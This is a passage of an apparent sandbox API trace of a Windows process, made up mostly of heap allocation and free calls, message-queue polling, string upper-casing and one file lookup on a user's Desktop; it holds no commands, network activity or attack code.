0x24a9678 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0188.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.662] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.662] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.662] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0188.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0188.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0188.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0188.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.664] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0188.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0188.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0188.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0188.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.666] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0188.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0188.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0188.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0188.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QHREQz7Xz.jpg", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16325200, ftCreationTime.dwHighDateTime=0x1d4d073, ftLastAccessTime.dwLowDateTime=0xa3a2000, ftLastAccessTime.dwHighDateTime=0x1d4c6c7, ftLastWriteTime.dwLowDateTime=0xa3a2000, ftLastWriteTime.dwHighDateTime=0x1d4c6c7, nFileSizeHigh=0x0, nFileSizeLow=0xad35, dwReserved0=0xb270006, dwReserved1=0xf503, cFileName="QHREQz7Xz.jpg", cAlternateFileName="QHREQZ~1.JPG")) returned 0xaa5860 [0188.668] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0188.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.671] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.671] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.671] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.671] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.671] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.671] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.672] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.672] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.672] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.672] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.672] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.673] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 